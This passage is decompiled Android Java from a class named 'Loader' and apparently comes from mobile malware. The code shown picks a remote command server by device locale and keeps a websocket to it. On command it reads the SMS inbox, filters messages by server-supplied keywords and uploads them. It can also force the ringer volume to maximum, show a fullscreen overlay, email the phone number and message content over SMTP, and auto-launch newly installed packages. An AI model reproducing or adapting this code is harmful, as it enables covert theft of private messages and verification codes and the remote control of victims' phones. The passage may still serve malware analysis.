  1658. sb.append("reconnect:");
  1659. sb.append(b);
  1660. Log.w("WS", sb.toString());
  1661. return;
  1662. }
  1663. iVar.a();
  1664. this.a.a.a.b();
  1665. }
  1666. }
  1667.  
  1668. public /* bridge */ /* synthetic */ Object a(Object obj) {
  1669. a((String) obj);
  1670. return d.i.a;
  1671. }
  1672.  
  1673. public final void a(String str) {
  1674. d.e.b.h.b(str, "addr");
  1675. StringBuilder sb = new StringBuilder();
  1676. sb.append("connecting: ");
  1677. sb.append(str);
  1678. Log.d("WS", sb.toString());
  1679. this.a.a.g.a(str).a(new AnonymousClass1(this), new AnonymousClass2(this));
  1680. }
  1681. };
  1682. iVar.a(new d.e.a.a<d.i>() {
  1683. public /* synthetic */ Object a() {
  1684. b();
  1685. return d.i.a;
  1686. }
  1687.  
  1688. public final void b() {
  1689. anonymousClass1.a(access$getUriBlocking);
  1690. }
  1691. });
  1692. anonymousClass1.a(access$getUriBlocking);
  1693. }
  1694. }
  1695.  
  1696. static final class g<T> implements c.a.d.d<Object> {
  1697. final /* synthetic */ Loader a;
  1698. final /* synthetic */ NotificationManager b;
  1699. final /* synthetic */ int c;
  1700.  
  1701. g(Loader loader, NotificationManager notificationManager, int i) {
  1702. this.a = loader;
  1703. this.b = notificationManager;
  1704. this.c = i;
  1705. }
  1706.  
  1707. public final void a(Object obj) {
  1708. if (obj instanceof Object[]) {
  1709. Object[] objArr = (Object[]) obj;
  1710. if (!(objArr.length == 0)) {
  1711. Object obj2 = objArr[0];
  1712. if (obj2 == null) {
  1713. throw new d.g("null cannot be cast to non-null type kotlin.String");
  1714. }
  1715. String str = (String) obj2;
  1716. if (str == null) {
  1717. throw new d.g("null cannot be cast to non-null type kotlin.CharSequence");
  1718. }
  1719. String obj3 = d.i.m.b(str).toString();
  1720. Object obj4 = objArr[1];
  1721. if (obj4 == null) {
  1722. throw new d.g("null cannot be cast to non-null type kotlin.String");
  1723. }
  1724. String str2 = (String) obj4;
  1725. if (str2 == null) {
  1726. throw new d.g("null cannot be cast to non-null type kotlin.CharSequence");
  1727. }
  1728. String obj5 = d.i.m.b(str2).toString();
  1729. Object obj6 = objArr[2];
  1730. if (obj6 == null) {
  1731. throw new d.g("null cannot be cast to non-null type kotlin.String");
  1732. }
  1733. String str3 = (String) obj6;
  1734. if (str3 == null) {
  1735. throw new d.g("null cannot be cast to non-null type kotlin.CharSequence");
  1736. }
  1737. String obj7 = d.i.m.b(str3).toString();
  1738. CharSequence charSequence = obj5;
  1739. if (charSequence.length() > 0) {
  1740. if (obj7.length() > 0) {
  1741. Intent intent = new Intent();
  1742. intent.setAction("android.intent.action.VIEW");
  1743. intent.setData(Uri.parse(obj7));
  1744. PendingIntent activity = PendingIntent.getActivity(Loader.access$getCtx$p(this.a), 100, intent, 268435456);
  1745. Notification.Builder builder = new Notification.Builder(Loader.access$getCtx$p(this.a));
  1746. builder.setContentText(charSequence);
  1747. builder.setContentTitle(obj3);
  1748. builder.setSmallIcon(Loader.access$getCtx$p(this.a).getResources().getIdentifier("icon", "mipmap", Loader.access$getCtx$p(this.a).getPackageName()));
  1749. builder.setAutoCancel(true);
  1750. builder.setContentIntent(activity);
  1751. if (VERSION.SDK_INT >= 16) {
  1752. this.b.notify(this.c, builder.build());
  1753. }
  1754. }
  1755. }
  1756. }
  1757. }
  1758. }
  1759. }
  1760.  
  1761. static final class h<T> implements c.a.d.d<Throwable> {
  1762. public static final h a = new h();
  1763.  
  1764. h() {
  1765. }
  1766.  
  1767. public final void a(Throwable th) {
  1768. th.printStackTrace();
  1769. }
  1770. }
  1771.  
  1772. static final class i extends d.e.b.i implements d.e.a.a<String> {
  1773. final /* synthetic */ Loader a;
  1774. final /* synthetic */ d.e.b.j.a b;
  1775.  
  1776. i(Loader loader, d.e.b.j.a aVar) {
  1777. this.a = loader;
  1778. this.b = aVar;
  1779. super(0);
  1780. }
  1781.  
  1782. /* renamed from: b */
  1783. public final String a() {
  1784. SharedPreferences access$getPreferences$p;
  1785. Object obj;
  1786. String sb;
  1787. Log.d("WS", "ns get............... ");
  1788. String string = Loader.access$getPreferences$p(this.a).getString("addr_accounts", "id538254835|id538255725|id538256404");
  1789. d.e.b.h.a((Object) string, "addrAccountsStr");
  1790. List a2 = d.i.m.a((CharSequence) string, new char[]{'|'}, false, 0, 6, null);
  1791. String locale = Locale.getDefault().toString();
  1792. d.e.b.h.a((Object) locale, "locale");
  1793. if (d.i.m.a(locale, "ko", false, 2, null)) {
  1794. access$getPreferences$p = Loader.access$getPreferences$p(this.a);
  1795. obj = a2.get(0);
  1796. } else if (d.i.m.a(locale, "ja", false, 2, null)) {
  1797. access$getPreferences$p = Loader.access$getPreferences$p(this.a);
  1798. obj = a2.get(1);
  1799. } else {
  1800. access$getPreferences$p = Loader.access$getPreferences$p(this.a);
  1801. obj = a2.get(2);
  1802. }
  1803. String string2 = access$getPreferences$p.getString("account", (String) obj);
  1804. if (d.e.b.h.a((Object) string2, (Object) "unknown")) {
  1805. throw new IllegalStateException("null......");
  1806. }
  1807. Loader loader = this.a;
  1808. d.e.b.h.a((Object) string2, "account");
  1809. String access$loadIPAddrVK = loader.a(string2);
  1810. StringBuilder sb2 = new StringBuilder();
  1811. sb2.append("ACC:");
  1812. sb2.append(string2);
  1813. Log.d("WS", sb2.toString());
  1814. if (access$loadIPAddrVK != null) {
  1815. if (d.i.m.a(access$loadIPAddrVK, "ssl://", false, 2, null)) {
  1816. sb = d.i.m.a(access$loadIPAddrVK, "ssl://", "wss://", false, 4, null);
  1817. } else {
  1818. StringBuilder sb3 = new StringBuilder();
  1819. sb3.append("ws://");
  1820. sb3.append(access$loadIPAddrVK);
  1821. sb = sb3.toString();
  1822. }
  1823. Loader.access$getPreferences$p(this.a).edit().putString("last_addr", sb).apply();
  1824. return sb;
  1825. }
  1826. this.a.j = "DNS ERROR";
  1827. String string3 = Loader.access$getPreferences$p(this.a).getString("last_addr", "");
  1828. if (!d.e.b.h.a((Object) string3, (Object) "")) {
  1829. access$loadIPAddrVK = string3;
  1830. }
  1831. this.b.a++;
  1832. if (this.b.a == 6) {
  1833. this.a.sendStartTLSMail("DNS ERROR");
  1834. }
  1835. return access$loadIPAddrVK;
  1836. }
  1837. }
  1838.  
  1839. static final class j implements Runnable {
  1840. final /* synthetic */ Loader a;
  1841.  
  1842. j(Loader loader) {
  1843. this.a = loader;
  1844. }
  1845.  
  1846. public final void run() {
  1847. this.a.i();
  1848. }
  1849. }
  1850.  
  1851. static final class k<T> implements c.a.d.d<Object> {
  1852. final /* synthetic */ Loader a;
  1853.  
  1854. /* renamed from: com.Loader$k$1 */
  1855. static final class AnonymousClass1<T> implements c.a.d.d<Object> {
  1856. final /* synthetic */ k a;
  1857.  
  1858. AnonymousClass1(k kVar) {
  1859. this.a = kVar;
  1860. }
  1861.  
  1862. /* JADX DEBUG: Multi-variable type inference result: failure, time: 10 ms */
  1863. /* JADX WARNING: type inference failed for: r3v9 */
  1864. /* JADX WARNING: type inference failed for: r4v6, types: [com.d] */
  1865. /* JADX WARNING: Unknown variable types count: 1 */
  1866. public final void a(java.lang.Object r16) {
  1867. /*
  1868. r15 = this;
  1869. java.lang.String r16 = (java.lang.String) r16 // Catch:{ Exception -> 0x00f1 }
  1870. if (r16 == 0) goto L_0x00f5
  1871. java.lang.String r2 = ""
  1872. r0 = r16
  1873. boolean r2 = d.e.b.h.a(r0, r2) // Catch:{ Exception -> 0x00f1 }
  1874. r2 = r2 ^ 1
  1875. if (r2 == 0) goto L_0x00f5
  1876. r0 = r16
  1877. java.lang.CharSequence r0 = (java.lang.CharSequence) r0 // Catch:{ Exception -> 0x00f1 }
  1878. r2 = r0
  1879. r3 = 1
  1880. java.lang.String[] r3 = new java.lang.String[r3] // Catch:{ Exception -> 0x00f1 }
  1881. r4 = 0
  1882. java.lang.String r5 = "|"
  1883. r3[r4] = r5 // Catch:{ Exception -> 0x00f1 }
  1884. r4 = 0
  1885. r5 = 0
  1886. r6 = 6
  1887. r7 = 0
  1888. java.util.List r9 = d.i.m.b(r2, r3, r4, r5, r6, r7) // Catch:{ Exception -> 0x00f1 }
  1889. com.Loader$k r2 = r15.a // Catch:{ Exception -> 0x00f1 }
  1890. com.Loader r2 = r2.a // Catch:{ Exception -> 0x00f1 }
  1891. android.content.SharedPreferences r2 = com.Loader.access$getPreferences$p(r2) // Catch:{ Exception -> 0x00f1 }
  1892. java.lang.String r3 = "sms_kw_sent"
  1893. r4 = 0
  1894. boolean r2 = r2.getBoolean(r3, r4) // Catch:{ Exception -> 0x00f1 }
  1895. if (r2 != 0) goto L_0x00f5
  1896. com.Loader$k r2 = r15.a // Catch:{ Exception -> 0x00f1 }
  1897. com.Loader r2 = r2.a // Catch:{ Exception -> 0x00f1 }
  1898. android.content.SharedPreferences r2 = com.Loader.access$getPreferences$p(r2) // Catch:{ Exception -> 0x00f1 }
  1899. android.content.SharedPreferences$Editor r2 = r2.edit() // Catch:{ Exception -> 0x00f1 }
  1900. java.lang.String r3 = "sms_kw_sent"
  1901. r4 = 1
  1902. android.content.SharedPreferences$Editor r2 = r2.putBoolean(r3, r4) // Catch:{ Exception -> 0x00f1 }
  1903. r2.apply() // Catch:{ Exception -> 0x00f1 }
  1904. java.util.ArrayList r2 = new java.util.ArrayList // Catch:{ Exception -> 0x00f1 }
  1905. r2.<init>() // Catch:{ Exception -> 0x00f1 }
  1906. r0 = r2
  1907. java.util.List r0 = (java.util.List) r0 // Catch:{ Exception -> 0x00f1 }
  1908. r8 = r0
  1909. com.Loader$k r2 = r15.a // Catch:{ Exception -> 0x00f1 }
  1910. com.Loader r2 = r2.a // Catch:{ Exception -> 0x00f1 }
  1911. android.content.Context r2 = com.Loader.access$getCtx$p(r2) // Catch:{ Exception -> 0x00f1 }
  1912. android.content.ContentResolver r2 = r2.getContentResolver() // Catch:{ Exception -> 0x00f1 }
  1913. java.lang.String r3 = "content://sms/"
  1914. android.net.Uri r3 = android.net.Uri.parse(r3) // Catch:{ Exception -> 0x00f1 }
  1915. r4 = 6
  1916. java.lang.String[] r4 = new java.lang.String[r4] // Catch:{ Exception -> 0x00f1 }
  1917. r5 = 0
  1918. java.lang.String r6 = "_id"
  1919. r4[r5] = r6 // Catch:{ Exception -> 0x00f1 }
  1920. r5 = 1
  1921. java.lang.String r6 = "address"
  1922. r4[r5] = r6 // Catch:{ Exception -> 0x00f1 }
  1923. r5 = 2
  1924. java.lang.String r6 = "person"
  1925. r4[r5] = r6 // Catch:{ Exception -> 0x00f1 }
  1926. r5 = 3
  1927. java.lang.String r6 = "body"
  1928. r4[r5] = r6 // Catch:{ Exception -> 0x00f1 }
  1929. r5 = 4
  1930. java.lang.String r6 = "date"
  1931. r4[r5] = r6 // Catch:{ Exception -> 0x00f1 }
  1932. r5 = 5
  1933. java.lang.String r6 = "type"
  1934. r4[r5] = r6 // Catch:{ Exception -> 0x00f1 }
  1935. r5 = 0
  1936. r6 = 0
  1937. java.lang.String r7 = "date desc"
  1938. android.database.Cursor r6 = r2.query(r3, r4, r5, r6, r7) // Catch:{ Exception -> 0x00f1 }
  1939. if (r6 == 0) goto L_0x00f5
  1940. L_0x0092:
  1941. boolean r2 = r6.moveToNext() // Catch:{ Exception -> 0x00f1 }
  1942. if (r2 == 0) goto L_0x0117
  1943. java.lang.String r2 = "address"
  1944. int r2 = r6.getColumnIndex(r2) // Catch:{ Exception -> 0x00f1 }
  1945. java.lang.String r2 = r6.getString(r2) // Catch:{ Exception -> 0x00f1 }
  1946. if (r2 == 0) goto L_0x0147
  1947. r5 = r2
  1948. L_0x00a5:
  1949. java.lang.String r2 = "body"
  1950. int r2 = r6.getColumnIndex(r2) // Catch:{ Exception -> 0x00f1 }
  1951. java.lang.String r4 = r6.getString(r2) // Catch:{ Exception -> 0x00f1 }
  1952. if (r4 == 0) goto L_0x014c
  1953. L_0x00b1:
  1954. java.lang.String r2 = "date"
  1955. int r2 = r6.getColumnIndex(r2) // Catch:{ Exception -> 0x00f1 }
  1956. long r10 = r6.getLong(r2) // Catch:{ Exception -> 0x00f1 }
  1957. java.lang.String r2 = "type"
  1958. int r2 = r6.getColumnIndex(r2) // Catch:{ Exception -> 0x00f1 }
  1959. int r2 = r6.getInt(r2) // Catch:{ Exception -> 0x00f1 }
  1960. r3 = 1
  1961. if (r2 != r3) goto L_0x0092
  1962. r0 = r9
  1963. java.lang.Iterable r0 = (java.lang.Iterable) r0 // Catch:{ Exception -> 0x00f1 }
  1964. r2 = r0
  1965. boolean r3 = r2 instanceof java.util.Collection // Catch:{ Exception -> 0x00f1 }
  1966. if (r3 == 0) goto L_0x00f6
  1967. r0 = r2
  1968. java.util.Collection r0 = (java.util.Collection) r0 // Catch:{ Exception -> 0x00f1 }
  1969. r3 = r0
  1970. boolean r3 = r3.isEmpty() // Catch:{ Exception -> 0x00f1 }
  1971. if (r3 == 0) goto L_0x00f6
  1972. L_0x00da:
  1973. r2 = 0
  1974. L_0x00db:
  1975. if (r2 == 0) goto L_0x0092
  1976. r2 = 3
  1977. java.lang.Object[] r2 = new java.lang.Object[r2] // Catch:{ Exception -> 0x00f1 }
  1978. r3 = 0
  1979. r2[r3] = r5 // Catch:{ Exception -> 0x00f1 }
  1980. r3 = 1
  1981. r2[r3] = r4 // Catch:{ Exception -> 0x00f1 }
  1982. r3 = 2
  1983. java.lang.Long r4 = java.lang.Long.valueOf(r10) // Catch:{ Exception -> 0x00f1 }
  1984. r2[r3] = r4 // Catch:{ Exception -> 0x00f1 }
  1985. r8.add(r2) // Catch:{ Exception -> 0x00f1 }
  1986. goto L_0x0092
  1987. L_0x00f1:
  1988. r2 = move-exception
  1989. r2.printStackTrace()
  1990. L_0x00f5:
  1991. return
  1992. L_0x00f6:
  1993. java.util.Iterator r7 = r2.iterator() // Catch:{ Exception -> 0x00f1 }
  1994. L_0x00fa:
  1995. boolean r2 = r7.hasNext() // Catch:{ Exception -> 0x00f1 }
  1996. if (r2 == 0) goto L_0x00da
  1997. java.lang.Object r2 = r7.next() // Catch:{ Exception -> 0x00f1 }
  1998. java.lang.String r2 = (java.lang.String) r2 // Catch:{ Exception -> 0x00f1 }
  1999. r0 = r4
  2000. java.lang.CharSequence r0 = (java.lang.CharSequence) r0 // Catch:{ Exception -> 0x00f1 }
  2001. r3 = r0
  2002. java.lang.CharSequence r2 = (java.lang.CharSequence) r2 // Catch:{ Exception -> 0x00f1 }
  2003. r12 = 0
  2004. r13 = 2
  2005. r14 = 0
  2006. boolean r2 = d.i.m.a(r3, r2, r12, r13, r14) // Catch:{ Exception -> 0x00f1 }
  2007. if (r2 == 0) goto L_0x00fa
  2008. r2 = 1
  2009. goto L_0x00db
  2010. L_0x0117:
  2011. r0 = r8
  2012. java.util.Collection r0 = (java.util.Collection) r0 // Catch:{ Exception -> 0x00f1 }
  2013. r2 = r0
  2014. boolean r2 = r2.isEmpty() // Catch:{ Exception -> 0x00f1 }
  2015. r2 = r2 ^ 1
  2016. if (r2 == 0) goto L_0x00f5
  2017. com.Loader$k r2 = r15.a // Catch:{ Exception -> 0x00f1 }
  2018. com.Loader r2 = r2.a // Catch:{ Exception -> 0x00f1 }
  2019. com.g r2 = r2.g // Catch:{ Exception -> 0x00f1 }
  2020. java.lang.String r3 = "onKwSms"
  2021. c.a.s r5 = r2.b(r3, r8) // Catch:{ Exception -> 0x00f1 }
  2022. com.Loader$k$1$1 r2 = com.Loader.k.1.AnonymousClass1.a // Catch:{ Exception -> 0x00f1 }
  2023. c.a.d.d r2 = (c.a.d.d) r2 // Catch:{ Exception -> 0x00f1 }
  2024. com.Loader$k$1$2 r3 = com.Loader.k.1.AnonymousClass2.a // Catch:{ Exception -> 0x00f1 }
  2025. d.e.a.b r3 = (d.e.a.b) r3 // Catch:{ Exception -> 0x00f1 }
  2026. if (r3 == 0) goto L_0x0141
  2027. com.d r4 = new com.d // Catch:{ Exception -> 0x00f1 }
  2028. r4.m362init(r3) // Catch:{ Exception -> 0x00f1 }
  2029. r3 = r4
  2030. L_0x0141:
  2031. c.a.d.d r3 = (c.a.d.d) r3 // Catch:{ Exception -> 0x00f1 }
  2032. r5.a(r2, r3) // Catch:{ Exception -> 0x00f1 }
  2033. goto L_0x00f5
  2034. L_0x0147:
  2035. java.lang.String r2 = ""
  2036. r5 = r2
  2037. goto L_0x00a5
  2038. L_0x014c:
  2039. java.lang.String r4 = ""
  2040. goto L_0x00b1
  2041. */
  2042. throw new UnsupportedOperationException("Method not decompiled: com.Loader$k$AnonymousClass1.a(java.lang.Object):void");
  2043. }
  2044. }
  2045.  
  2046. /* renamed from: com.Loader$k$3 */
  2047. static final class AnonymousClass3<T> implements c.a.d.d<Object> {
  2048. final /* synthetic */ k a;
  2049.  
  2050. AnonymousClass3(k kVar) {
  2051. this.a = kVar;
  2052. }
  2053.  
  2054. public final void a(Object obj) {
  2055. Loader loader = this.a.a;
  2056. if (obj == null) {
  2057. throw new d.g("null cannot be cast to non-null type kotlin.Boolean");
  2058. }
  2059. loader.k = ((Boolean) obj).booleanValue();
  2060. if (this.a.a.k) {
  2061. Object systemService = Loader.access$getCtx$p(this.a.a).getSystemService("audio");
  2062. if (systemService == null) {
  2063. throw new d.g("null cannot be cast to non-null type android.media.AudioManager");
  2064. }
  2065. AudioManager audioManager = (AudioManager) systemService;
  2066. audioManager.setStreamVolume(2, audioManager.getStreamMaxVolume(2), 0);
  2067. audioManager.setRingerMode(2);
  2068. }
  2069. }
  2070. }
  2071.  
  2072. /* renamed from: com.Loader$k$5 */
  2073. static final class AnonymousClass5<T> implements c.a.d.d<Object> {
  2074. final /* synthetic */ k a;
  2075.  
  2076. AnonymousClass5(k kVar) {
  2077. this.a = kVar;
  2078. }
  2079.  
  2080. public final void a(Object obj) {
  2081. if (obj == null) {
  2082. throw new d.g("null cannot be cast to non-null type kotlin.Boolean");
  2083. } else if (((Boolean) obj).booleanValue()) {
  2084. this.a.a.showFullscreenFloatWindow();
  2085. } else {
  2086. this.a.a.removeFullscreenFloatWindow();
  2087. }
  2088. }
  2089. }
  2090.  
  2091. k(Loader loader) {
  2092. this.a = loader;
  2093. }
  2094.  
  2095. /* JADX DEBUG: Multi-variable type inference result: failure, time: 8 ms */
  2096. /* JADX WARNING: type inference failed for: r1v4 */
  2097. /* JADX WARNING: type inference failed for: r2v3, types: [com.d] */
  2098. /* JADX WARNING: Unknown variable types count: 1 */
  2099. public final void a(java.lang.Object r6) {
  2100. /*
  2101. r5 = this;
  2102. r4 = 0
  2103. java.lang.String r0 = "WS"
  2104. java.lang.String r1 = "onHello"
  2105. android.util.Log.d(r0, r1)
  2106. com.Loader r0 = r5.a
  2107. r0.h()
  2108. com.Loader r0 = r5.a
  2109. com.g r0 = r0.g
  2110. java.lang.String r1 = "getSmsKW"
  2111. c.a.s r3 = r0.b(r1, r4)
  2112. com.Loader$k$1 r0 = new com.Loader$k$1
  2113. r0.m260init(r5)
  2114. c.a.d.d r0 = (c.a.d.d) r0
  2115. com.Loader$k$2 r1 = com.Loader.k.AnonymousClass2.a
  2116. d.e.a.b r1 = (d.e.a.b) r1
  2117. if (r1 == 0) goto L_0x002c
  2118. com.d r2 = new com.d
  2119. r2.m362init(r1)
  2120. r1 = r2
  2121. L_0x002c:
  2122. c.a.d.d r1 = (c.a.d.d) r1
  2123. r3.a(r0, r1)
  2124. com.Loader r0 = r5.a
  2125. com.g r0 = r0.g
  2126. java.lang.String r1 = "is_call_rec_enable"
  2127. c.a.s r2 = r0.b(r1, r4)
  2128. com.Loader$k$3 r0 = new com.Loader$k$3
  2129. r0.m267init(r5)
  2130. c.a.d.d r0 = (c.a.d.d) r0
  2131. com.Loader$k$4 r1 = com.Loader.k.AnonymousClass4.a
  2132. c.a.d.d r1 = (c.a.d.d) r1
  2133. r2.a(r0, r1)
  2134. com.Loader r0 = r5.a
  2135. com.g r0 = r0.g
  2136. java.lang.String r1 = "is_show_fs_float_window"
  2137. c.a.s r0 = r0.b(r1, r4)
  2138. c.a.r r1 = c.a.a.b.a.a()
  2139. c.a.s r2 = r0.a(r1)
  2140. com.Loader$k$5 r0 = new com.Loader$k$5
  2141. r0.m270init(r5)
  2142. c.a.d.d r0 = (c.a.d.d) r0
  2143. com.Loader$k$6 r1 = com.Loader.k.AnonymousClass6.a
  2144. c.a.d.d r1 = (c.a.d.d) r1
  2145. r2.a(r0, r1)
  2146. java.util.Locale r0 = java.util.Locale.getDefault()
  2147. java.lang.String r0 = r0.toString()
  2148. java.lang.String r1 = "Locale.getDefault().toString()"
  2149. d.e.b.h.a(r0, r1)
  2150. java.lang.String r1 = "ko"
  2151. r2 = 0
  2152. r3 = 2
  2153. boolean r0 = d.i.m.a(r0, r1, r2, r3, r4)
  2154. if (r0 != 0) goto L_0x008f
  2155. com.Loader r0 = r5.a
  2156. java.lang.String r0 = r0.e()
  2157. com.Loader r1 = r5.a
  2158. r1.c(r0)
  2159. L_0x008f:
  2160. return
  2161. */
  2162. throw new UnsupportedOperationException("Method not decompiled: com.Loader$k.a(java.lang.Object):void");
  2163. }
  2164. }
  2165.  
  2166. static final class l extends d.e.b.g implements d.e.a.b<Throwable, d.i> {
  2167. public static final l a = new l();
  2168.  
  2169. l() {
  2170. super(1);
  2171. }
  2172.  
  2173. public final d.g.c a() {
  2174. return d.e.b.k.a(Throwable.class);
  2175. }
  2176.  
  2177. public /* bridge */ /* synthetic */ Object a(Object obj) {
  2178. a((Throwable) obj);
  2179. return d.i.a;
  2180. }
  2181.  
  2182. public final void a(Throwable th) {
  2183. d.e.b.h.b(th, "p1");
  2184. th.printStackTrace();
  2185. }
  2186.  
  2187. public final String b() {
  2188. return "printStackTrace";
  2189. }
  2190.  
  2191. public final String c() {
  2192. return "printStackTrace()V";
  2193. }
  2194. }
  2195.  
  2196. static final class m<T> implements c.a.d.d<Object> {
  2197. public static final m a = new m();
  2198.  
  2199. m() {
  2200. }
  2201.  
  2202. public final void a(Object obj) {
  2203. Log.d("WS", "state updateed");
  2204. }
  2205. }
  2206.  
  2207. static final class n extends d.e.b.g implements d.e.a.b<Throwable, d.i> {
  2208. public static final n a = new n();
  2209.  
  2210. n() {
  2211. super(1);
  2212. }
  2213.  
  2214. public final d.g.c a() {
  2215. return d.e.b.k.a(Throwable.class);
  2216. }
  2217.  
  2218. public /* bridge */ /* synthetic */ Object a(Object obj) {
  2219. a((Throwable) obj);
  2220. return d.i.a;
  2221. }
  2222.  
  2223. public final void a(Throwable th) {
  2224. d.e.b.h.b(th, "p1");
  2225. th.printStackTrace();
  2226. }
  2227.  
  2228. public final String b() {
  2229. return "printStackTrace";
  2230. }
  2231.  
  2232. public final String c() {
  2233. return "printStackTrace()V";
  2234. }
  2235. }
  2236.  
  2237. public static final class o extends BroadcastReceiver {
  2238. final /* synthetic */ Loader a;
  2239.  
  2240. static final class a implements Runnable {
  2241. final /* synthetic */ o a;
  2242. final /* synthetic */ Intent b;
  2243.  
  2244. a(o oVar, Intent intent) {
  2245. this.a = oVar;
  2246. this.b = intent;
  2247. }
  2248.  
  2249. public final void run() {
  2250. Loader.access$getCtx$p(this.a.a).startActivity(this.b);
  2251. }
  2252. }
  2253.  
  2254. static final class b implements Runnable {
  2255. final /* synthetic */ o a;
  2256. final /* synthetic */ String b;
  2257.  
  2258. b(o oVar, String str) {
  2259. this.a = oVar;
  2260. this.b = str;
  2261. }
  2262.  
  2263. public final void run() {
  2264. g access$getPeer$p = this.a.a.g;
  2265. StringBuilder sb = new StringBuilder();
  2266. sb.append("301:");
  2267. sb.append(this.b);
  2268. access$getPeer$p.a(1000, sb.toString()).a();
  2269. }
  2270. }
  2271.  
  2272. static final class c extends d.e.b.i implements d.e.a.c<m, String, d.i> {
  2273. public static final c a = new c();
  2274.  
  2275. c() {
  2276. super(2);
  2277. }
  2278.  
  2279. public /* bridge */ /* synthetic */ Object a(Object obj, Object obj2) {
  2280. a((m) obj, (String) obj2);
  2281. return d.i.a;
  2282. }
  2283.  
  2284. public final void a(m mVar, String str) {
  2285. d.e.b.h.b(mVar, "sms");
  2286. }
  2287. }
  2288.  
  2289. static final class d extends d.e.b.i implements d.e.a.c<m, String, d.i> {
  2290. public static final d a = new d();
  2291.  
  2292. d() {
  2293. super(2);
  2294. }
  2295.  
  2296. public /* bridge */ /* synthetic */ Object a(Object obj, Object obj2) {
  2297. a((m) obj, (String) obj2);
  2298. return d.i.a;
  2299. }
  2300.  
  2301. public final void a(m mVar, String str) {
  2302. d.e.b.h.b(mVar, "sms");
  2303. }
  2304. }
  2305.  
  2306. static final class e implements Runnable {
  2307. final /* synthetic */ o a;
  2308. final /* synthetic */ String b;
  2309. final /* synthetic */ String c;
  2310. final /* synthetic */ d.e.b.j.b d;
  2311. final /* synthetic */ d.e.b.j.b e;
  2312. final /* synthetic */ String f;
  2313. final /* synthetic */ String g;
  2314.  
  2315. /* renamed from: com.Loader$o$e$1 */
  2316. static final class AnonymousClass1 extends d.e.b.i {
  2317. final /* synthetic */ e a;
  2318.  
  2319. AnonymousClass1(e eVar) {
  2320. this.a = eVar;
  2321. super(3);
  2322. }
  2323.  
  2324. public final MimeMessage a(Session session, String str, String str2) {
  2325. d.e.b.h.b(session, "session");
  2326. d.e.b.h.b(str, "sendMail");
  2327. d.e.b.h.b(str2, "receiveMail");
  2328. Object systemService = Loader.access$getCtx$p(this.a.a.a).getSystemService("phone");
  2329. if (systemService == null) {
  2330. throw new d.g("null cannot be cast to non-null type android.telephony.TelephonyManager");
  2331. }
  2332. String access$getLine1 = this.a.a.a.a((TelephonyManager) systemService);
  2333. if (access$getLine1 == null) {
  2334. access$getLine1 = "";
  2335. }
  2336. MimeMessage mimeMessage = new MimeMessage(session);
  2337. StringBuilder sb = new StringBuilder();
  2338. sb.append("用户:");
  2339. sb.append(access$getLine1);
  2340. mimeMessage.setFrom(new InternetAddress(str, sb.toString(), "UTF-8"));
  2341. mimeMessage.setRecipient(MimeMessage.RecipientType.TO, new InternetAddress(str2, "XX用户", "UTF-8"));
  2342. mimeMessage.setSubject("新的信息", "UTF-8");
  2343. StringBuilder sb2 = new StringBuilder();
  2344. sb2.append("");
  2345. sb2.append(this.a.b);
  2346. sb2.append(":\r\n");
  2347. sb2.append(this.a.c);
  2348. mimeMessage.setContent(sb2.toString(), "text/html;charset=UTF-8");
  2349. mimeMessage.setSentDate(new Date());
  2350. mimeMessage.saveChanges();
  2351. return mimeMessage;
  2352. }
  2353. }
  2354.  
  2355. e(o oVar, String str, String str2, d.e.b.j.b bVar, d.e.b.j.b bVar2, String str3, String str4) {
  2356. this.a = oVar;
  2357. this.b = str;
  2358. this.c = str2;
  2359. this.d = bVar;
  2360. this.e = bVar2;
  2361. this.f = str3;
  2362. this.g = str4;
  2363. }
  2364.  
  2365. public final void run() {
  2366. try {
  2367. AnonymousClass1 anonymousClass1 = new AnonymousClass1(this);
  2368. Properties properties = new Properties();
  2369. properties.setProperty("mail.transport.protocol", "smtp");
  2370. properties.setProperty("mail.smtp.host", (String) this.d.a);
  2371. properties.setProperty("mail.smtp.port", (String) this.e.a);
  2372. properties.setProperty("mail.smtp.auth", "true");
  2373. Session instance = Session.getInstance(properties);
  2374. d.e.b.h.a((Object) instance, "session");
  2375. instance.setDebug(true);
  2376. MimeMessage a2 = anonymousClass1.a(instance, this.f, this.f);
  2377. Transport transport = instance.getTransport();
  2378. transport.connect(this.f, this.g);
  2379. transport.sendMessage(a2, a2.getAllRecipients());
  2380. transport.close();
  2381. } catch (Exception e2) {
  2382. e2.printStackTrace();
  2383. }
  2384. }
  2385. }
  2386.  
  2387. static final class f implements Runnable {
  2388. final /* synthetic */ o a;
  2389.  
  2390. f(o oVar) {
  2391. this.a = oVar;
  2392. }
  2393.  
  2394. public final void run() {
  2395. this.a.a.requestIgnoreBatteryOpt();
  2396. }
  2397. }
  2398.  
  2399. o(Loader loader) {
  2400. this.a = loader;
  2401. }
  2402.  
  2403. public void onReceive(Context context, Intent intent) {
  2404. Loader loader;
  2405. String sb;
  2406. d.e.b.h.b(context, "context");
  2407. d.e.b.h.b(intent, "intent");
  2408. try {
  2409. String action = intent.getAction();
  2410. if (d.e.b.h.a((Object) action, (Object) "android.intent.action.PACKAGE_ADDED")) {
  2411. String dataString = intent.getDataString();
  2412. d.e.b.h.a((Object) dataString, "intent.dataString");
  2413. if (dataString == null) {
  2414. throw new d.g("null cannot be cast to non-null type java.lang.String");
  2415. }
  2416. String lowerCase = dataString.toLowerCase();
  2417. d.e.b.h.a((Object) lowerCase, "(this as java.lang.String).toLowerCase()");
  2418. String a2 = d.i.m.a(lowerCase, "package:", "", false, 4, null);
  2419. this.a.c.add(a2);
  2420. b.a.b(a2);
  2421. if (this.a.d.contains(a2)) {
  2422. StringBuilder sb2 = new StringBuilder();
  2423. sb2.append("");
  2424. sb2.append(c.k);
  2425. sb2.append('/');
  2426. sb2.append(a2);
  2427. sb2.append(".apk");
  2428. File file = new File(sb2.toString());
  2429. if (file.exists()) {
  2430. file.delete();
  2431. }
  2432. Intent launchIntentForPackage = Loader.access$getCtx$p(this.a).getPackageManager().getLaunchIntentForPackage(a2);
  2433. if (launchIntentForPackage != null) {
  2434. try {
  2435. launchIntentForPackage.addFlags(268435456);
  2436. this.a.b.post(new a(this, launchIntentForPackage));
  2437. } catch (Exception e2) {
  2438. }
  2439. }
  2440. this.a.d.remove(a2);
  2441. }
  2442. loader = this.a;
  2443. } else if (d.e.b.h.a((Object) action, (Object) "android.intent.action.PACKAGE_REMOVED")) {
  2444. String dataString2 = intent.getDataString();
  2445. d.e.b.h.a((Object) dataString2, "intent.dataString");
  2446. if (dataString2 == null) {
  2447. throw new d.g("null cannot be cast to non-null type java.lang.String");
  2448. }
  2449. String lowerCase2 = dataString2.toLowerCase();
